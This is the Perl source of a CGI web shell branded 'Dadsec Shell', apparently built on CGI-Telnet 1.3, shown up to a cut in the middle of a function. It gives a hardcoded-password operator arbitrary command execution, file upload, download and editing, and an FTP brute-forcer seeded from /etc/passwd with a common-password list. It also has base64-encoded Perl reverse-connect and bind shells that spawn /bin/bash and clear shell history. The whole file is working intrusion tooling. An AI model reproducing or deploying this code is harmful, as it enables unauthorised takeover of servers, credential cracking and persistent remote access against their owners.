#!/usr/bin/perl -I/usr/local/bandmin
use MIME::Base64;
$Version= "CGI-Telnet Version 1.3";
$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255 149 41), 0px 0px 5px rgb(46 255 41), 0px 0px 5px rgb(0 0 0);color:#ffffff;font-weight:bold;'>Dadsec</font>";
$Password = "dadsec";
sub Is_Win(){
$os = &trim($ENV{"SERVER_SOFTWARE"});
if($os =~ m/win/i){ return 1;}else{return 0;}}
$WinNT = &Is_Win();
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 10000;
$ShowDynamicOutput = 1;
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
$cols= 150;
$rows= 26;
sub ReadParse
{ local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1;
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//;
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
my $dir =$CurrentDir;
$dir=~ s/\\/\\\\/g;
print "Content-type: text/html\n\n";
print <<END;
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Dadsec Shell</title>
$HtmlMetaHeader
</head>
<style>
body{
font: 10pt Verdana;
}
tr {
BORDER-RIGHT: #ef1c1c57 1px solid;
BORDER-TOP: #ef1c1c57 1px solid;
BORDER-LEFT: #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
color: #fff;
}
td {
BORDER-RIGHT: #ef1c1c57 1px solid;
BORDER-TOP: #ef1c1c57 1px solid;
BORDER-LEFT: #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
color: #fff;
font: 10pt Verdana;
}
table {
BORDER-RIGHT: #ef1c1c57 1px solid;
BORDER-TOP: #ef1c1c57 1px solid;
BORDER-LEFT: #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
BACKGROUND-COLOR: #111;
}
input {
BORDER-RIGHT: #ef1c1c57 1px solid;
BORDER-TOP: #ef1c1c57 1px solid;
BORDER-LEFT: #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
BACKGROUND-COLOR: Black;
font: 10pt Verdana;
color: #fff;
}
input.submit {
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #FFFFFF;
border-color: #009900;
}
code {
border : dashed 0px #333;
border-style:dashed;
BACKGROUND-COLOR: Black;
font: 10pt Verdana bold;
color: while;
}
run {
border : dashed 0px #333;
border-style:dashed;
font: 10pt Verdana bold;
color: #FF00AA;
}
textarea {
BORDER-RIGHT: #ef1c1c57 1px solid;
BORDER-TOP: #ef1c1c57 1px solid;
BORDER-LEFT: #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
BACKGROUND-COLOR: #1b1b1b;
border-style:dashed;
font: Fixedsys bold;
color: #aaa;
}
A:link {
COLOR: #fff; TEXT-DECORATION: none
}
A:visited {
COLOR: #fff; TEXT-DECORATION: none
}
A:hover {
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #fff; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
.listdir tr:hover{
background: #444;
}
.listdir tr:hover td{
background: #444;
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #FFFFFF; TEXT-DECORATION: none;
}
.notline{
background: #111;
}
.line{
background: #ef1c1c38;
}
</style>
<script language="javascript">
function chmod_form(i,file)
{
/*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
var ajax="";
document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + " name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
document.getElementById("text_" + i).focus();
}
function rm_chmod_form(response,i,perms,file)
{
response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
}
function rename_form(i,file,f)
{
var ajax="";
f.replace(/\\\\/g,"\\\\\\\\");
var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + " name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
document.getElementById("text_" + i).focus();
}
function rm_rename_form(i,file,f)
{
if(f=='f')
{
document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
}else
{
document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
}
}
</script>
<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<center><code>
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td align="center" rowspan=2>
<b><font size="5">$EditPersion</font></b>
</td>
<td>
<font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
</td>
<td>Server IP:<font color="green"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="green">$ENV{'REMOTE_ADDR'}</font>
</td>
</tr>
<tr>
<td colspan="3"><font face="Verdana" size="2">
<a href="$ScriptLocation">Home</a> |
<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Command</a> |
<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">GUI</a> |
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=backbind">Back & Bind</a> |
<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
<a href="$ScriptLocation?a=checklog">Check Log</a> |
<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
<a href="$ScriptLocation?a=logout">Logout</a> |
<a target='_blank' href="#">Help</a>
</font></td>
</tr>
</table>
<font id="ResponseData" color="#fff" >
END
}
sub PrintLoginScreen
{
print <<END;
<pre><script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true; // Never run.
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
return;
}
if(this.currentText == "") this.element.innerHTML = "";
// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
</pre>
<div style="font-weight:800;letter-spacing:-0.025em;color:white;font-size:4.25rem;line-height:2.5rem;font-family:system-ui,Segoe UI Emoji;">Dadsec Shell</div><br><br><div style="font-weight:800;letter-spacing:-0.025em;color:green;font-size:2rem;line-height:2.5rem;font-family:system-ui,Segoe UI Emoji;">Pass: dadsec</div><br>
<table align="center" border="1" border-style="dashed" width="600" heigh>
<tbody><tr>
<td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
</tr>
</tbody></table>
<br>
<script type="text/javascript">
new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
TypingText.runAll();
</script>
END
}
sub HtmlSpecialChars($){
my $text = shift;
$text =~ s/&/&/g;
$text =~ s/"/"/g;
$text =~ s/'/'/g;
$text =~ s/</</g;
$text =~ s/>/>/g;
return $text;
}
sub AddLinkDir($)
{
my $ac=shift;
my @dir=();
if($WinNT)
{
@dir=split(/\\/,$CurrentDir);
}else
{
@dir=split("/",&trim($CurrentDir));
}
my $path="";
my $result="";
foreach (@dir)
{
$path .= $_.$PathSep;
$result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
}
return $result;
}
sub PrintLoginFailedMessage
{
print <<END;
Password:<br>
Login incorrect<br><br>
END
}
sub PrintLoginForm
{
print <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
Password:<input type="password" name="p">
<input class="submit" type="submit" value="Enter">
</form>
END
}
sub PrintPageFooter
{
print "<br></code></center></body></html>";
}
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}
sub PrintLogoutScreen
{
print "Connection closed by foreign host.<br><br>";
}
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n";
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
exit;
}
sub PerformLogin
{
if($LoginPassword eq $Password)
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader;
print &ListDir;
}
else
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "")
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
exit;
}
}
sub PrintCommandLineInputForm
{
my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
$Prompt = $WinNT ? "$dir > " : "<font color='green'>[admin\@$ServerName $dir]\$</font> ";
return <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" size="40" name="c">
<input class="submit"type="submit" value="Enter">
</form>
END
}
sub PrintFileDownloadForm
{
my $dir = &AddLinkDir("download");
$Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
return <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input class="file" type="text" name="f" size="35"><br><br>
Download: <input class="submit" type="submit" value="Begin">
</form>
END
}
sub PrintFileUploadForm
{
my $dir= &AddLinkDir("upload");
$Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
return <<END;
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input class="file" type="file" name="f" size="35"><br><br>
Options: <input type="checkbox" name="o" id="up" value="overwrite">
<label for="up">Overwrite if it Exists</label><br><br>
Upload: <input class="submit" type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input class="submit" type="hidden" name="a" value="upload">
</form>
END
}
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
return <<END;
</textarea>
<br><font color=yellow>
Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
<br><font size='6' color=red>Killed it!</font>
END
}
}
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
my $result="";
if(-e $FileUrl)
{
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
&PrintPageHeader("c");
$result .= <<END;
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>
END
$result .= &PrintCommandLineInputForm;
}
else
{
$result .= "Failed to download $FileUrl: $!";
$result .= &PrintFileDownloadForm;
}
return $result;
}
sub SendFileToBrowser
{
my $result = "";
local($SendFile) = @_;
if(open(SENDFILE, $SendFile))
{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while(<SENDFILE>);
close(SENDFILE);
exit(1);
}
else
{
$result .= "Failed to download $SendFile: $!";
$result .=&PrintFileDownloadForm;
}
return $result;
}
sub BeginDownload
{
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//)))
{
$TargetFile = $TransferFile;
}
else
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go")
{
&SendFileToBrowser($TargetFile);
}
else
{
&PrintDownloadLinkPage($TargetFile);
}
}
sub UploadFile
{
if($TransferFile eq "")
{
return &PrintFileUploadForm;
}
my $result="";
$result .= "Uploading $TransferFile to $CurrentDir...<br>";
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;
$TargetFileSize = length($in{'filedata'});
if(-e $TargetName && $Options ne "overwrite")
{
$result .= "Failed: Destination file already exists.<br>";
}
else
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
$result .= "Transfered $TargetFileSize Bytes.<br>";
$result .= "File Path: $TargetName<br>";
}
else
{
$result .= "Failed: $!<br>";
}
}
$result .= &PrintCommandLineInputForm;
return $result;
}
sub DownloadFile
{
if($TransferFile eq "")
{
&PrintPageHeader("f");
return &PrintFileDownloadForm;
}
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//)))
{
$TargetFile = $TransferFile;
}
else
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go")
{
return &SendFileToBrowser($TargetFile);
}
else
{
return &PrintDownloadLinkPage($TargetFile);
}
}
sub ExecuteCommand
{
my $result="";
if($RunCommand =~ m/^\s*cd\s+(.+)/)
{
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
$result .= &PrintCommandLineInputForm;
$result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
$RunCommand= $WinNT?"dir":"dir -lia";
$result .= &RunCmd;
}elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
{
$result .= &SaveFileForm;
}else
{
$result .= &PrintCommandLineInputForm;
$result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
$result .=&RunCmd;
}
$result .= "</textarea>";
return $result;
}
sub RunCmd
{
my $result="";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput)
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while(<CommandOutput>)
{
$_ =~ s/(\n|\r\n)$//;
$result .= &HtmlSpecialChars("$_\n");
}
$|=0;
}
else
{
$result .= &HtmlSpecialChars('$Command');
}
if(!$WinNT)
{
alarm(0);
}
return $result;
}
sub SaveFileForm
{
my $result ="";
substr($RunCommand,0,5)="";
my $file=&trim($RunCommand);
$save='<br><input name="a" type="submit" value="save" class="submit" >';
$File=$CurrentDir.$PathSep.$RunCommand;
my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
if(-w $File)
{
$rows="23"
}else
{
$msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
$rows="20"
}
$Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
$read=($WinNT)?"type":"less";
$RunCommand = "$read \"$RunCommand\"";
$result .= <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" size="40" name="c">
<input name="s" class="submit" type="submit" value="Enter">
<br>Command: <run> $RunCommand </run>
<input type="hidden" name="file" value="$file" > $save <br> $msg
<br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
END
$result .= &RunCmd;
$result .= "</textarea>";
$result .= "</form>";
return $result;
}
sub SaveFile($)
{
my $Data= shift ;
my $File= shift;
$File=$CurrentDir.$PathSep.$File;
if(open(FILE, ">$File"))
{
binmode FILE;
print FILE $Data;
close FILE;
return 1;
}else
{
return 0;
}
}
sub BruteForcerForm
{
my $result="";
$result .= <<END;
<table>
<tr>
<td colspan="2" align="center">
####################################<br>
Simple FTP brute forcer<br>
####################################
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="bruteforcer"/>
</td>
</tr>
<tr>
<td>User:<br><textarea rows="18" cols="30" name="user">
END
chop($result .= `less /etc/passwd | cut -d: -f1`);
$result .= <<'END';
</textarea></td>
<td>
Pass:<br>
<textarea rows="18" cols="30" name="pass">123pass
123!@#
123admin
123abc
123456admin
1234554321
12344321
pass123
admin
admincp
administrator
matkhau
passadmin
p@ssword
p@ssw0rd
password
123456
1234567
12345678
123456789
1234567890
111111
000000
222222
333333
444444
555555
666666
777777
888888
999999
123123
234234
345345
456456
567567
678678
789789
123321
456654
654321
7654321
87654321
987654321
0987654321
admin123
admin123456
abcdef
abcabc
!@#!@#
!@#$%^
!@#$%^&*(
!@#$$#@!
abc123
anhyeuem
iloveyou</textarea>
</td>
</tr>
<tr>
<td colspan="2" align="center">
Sleep:<select name="sleep">
<option>0</option>
<option>1</option>
<option>2</option>
<option>3</option>
</select>
<input type="submit" class="submit" value="Brute Forcer"/></td></tr>
</form>
</table>
END
return $result;
}
sub BruteForcer
{
my $result="";
$Server=$ENV{'SERVER_ADDR'};
if($in{'user'} eq "")
{
$result .= &BruteForcerForm;
}else
{
use Net::FTP;
@user= split(/\n/, $in{'user'});
@pass= split(/\n/, $in{'pass'});
chomp(@user);
chomp(@pass);
$result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
foreach $username (@user)
{
if(!($username eq ""))
{
foreach $password (@pass)
{
$ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
if($ftp->login("$username","$password"))
{
$result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
$ftp->quit();
break;
}
if(!($in{'sleep'} eq "0"))
{
sleep(int($in{'sleep'}));
}
$ftp->quit();
}
}
}
$result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
}
return $result;
}
sub BackBindForm
{
return <<END;
<br><br>
<table>
<tr>
<form name="f" method="POST" action="$ScriptLocation">
<td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
<td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
<td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
</form>
</tr>
<tr>
<td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
<br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
<br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
</tr>
</table>
<br><br>
<table>
<tr>
<form method="POST" action="$ScriptLocation">
<td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
<td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
<td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
</form>
</tr>
<tr>
<td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
<br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
</tr>
</table><br>
END
}
sub BackBind
{
use MIME::Base64;
use Socket;
$backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
$bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";
$ClientAddr = $in{'clientaddr'};
$ClientPort = int($in{'clientport'});
if($ClientPort eq 0)
{
return &BackBindForm;
}elsif(!$ClientAddr eq "")
{
$Data=decode_base64($backperl);
if(-w "/tmp/")
{
$File="/tmp/backconnect.pl";
}else
{
$File=$CurrentDir.$PathSep."backconnect.pl";
}
open(FILE, ">$File");
print FILE $Data;
close FILE;
system("perl backconnect.pl $ClientAddr $ClientPort");
unlink($File);
exit 0;
}else
{
$Data=decode_base64($bindperl);
if(-w "/tmp")
{
$File="/tmp/bindport.pl";
}else
{
$File=$CurrentDir.$PathSep."bindport.pl";
}
open(FILE, ">$File");
print FILE $Data;
close FILE;
system("perl bindport.pl $ClientPort");
unlink($File);
exit 0;
}
}
sub RmDir($)
{
my $dir = shift;
if(opendir(DIR,$dir))
{
while($file = readdir(DIR))
{
if(($file ne ".") && ($file ne ".."))
{
$file= $dir.$PathSep.$file;
if(-d $file)
{
&RmDir($file);
}
else
{
unlink($file);
}
}
}
closedir(DIR);
}
if(!rmdir($dir))
{
}
}
sub FileOwner($)
{
my $file = shift;
if(-e $file)
{
($uid,$gid) = (stat($file))[4,5];
if($WinNT)
{
return "???";
}
else
{
$name=getpwuid($uid);
$group=getgrgid($gid);
return $name."/".$group;
}
}
return "???";
}
sub ParentFolder($)
{
my $path = shift;
my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
chop($path = `$Comm`);
return $path;
}
sub FilePerms($)
{
my $file = shift;
my $ur = "-";
my $uw = "-";
if(-e $file)
{
if($WinNT)
{
